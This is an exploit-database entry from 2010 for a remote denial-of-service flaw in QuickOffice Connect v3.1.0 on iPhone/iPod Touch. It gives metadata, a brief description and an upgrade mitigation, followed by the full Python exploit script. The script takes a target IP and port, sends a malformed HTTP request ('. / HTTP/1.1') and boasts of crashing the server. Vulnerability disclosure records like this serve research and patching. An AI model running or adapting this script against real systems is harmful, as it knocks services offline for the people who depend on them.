Exploit: QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method Remote DoS

vendor:

QuickOffice Connect

by:

Nishant Das Patnaik

7,8

CVSS

HIGH

Malformed HTTP Method Remote DoS

N/A

CWE

Product Name: QuickOffice Connect

Affected Version From: 3.1.0

Affected Version To: 3.1.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPod 2G with iOS v3.1.3

2010

Exploit: QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method Remote DoS

QuickOffice v3.1.0 for iPhone/iPod Touch is vulnerable to a malformed HTTP Method Remote Denial of Service attack. An attacker can send a specially crafted HTTP request with an invalid method to the server, causing the server to crash. This vulnerability affects QuickOffice Connect v3.1.0 and prior program versions.

Mitigation:

Upgrade to the latest version of QuickOffice Connect.

Source

Exploit-DB raw data:

# Exploit: QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method Remote DoS
# Date: 14/06/2010
# Author: Nishant Das Patnaik
# Website: http://nishantdaspatnaik.yolasite.com
# Software Link: http://itunes.apple.com/us/app/quickoffice-connect/id304673686?mt=8
# Version: 3.1.0
# Tested on: iPod 2G with iOS v3.1.3
# Note: QuickOffice Connect v3.1.0 and prior program versions may be also vulnerable.


#!/usr/bin/env python
import os
import sys
import socket
def main(argv):
    argc = len(argv)
    if argc != 3:
        print "Usage: %s <target-ip> <target-port>" % (argv[0])
        sys.exit(0)
    host = argv[1]
    port = int(argv[2])
    print "[+] Connecting: %s:%d" % (host, port)
    payload = ". / HTTP/1.1\r\n\r\n"
    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.connect((host, port))
    print "[+] Sending payload..."
    print "[+] Did you see that b00m? http://nishantdaspatnaik.yolasite.com"
    sd.send(payload)
    sd.close()
if __name__ == "__main__":
    main(sys.argv)
    sys.exit(0)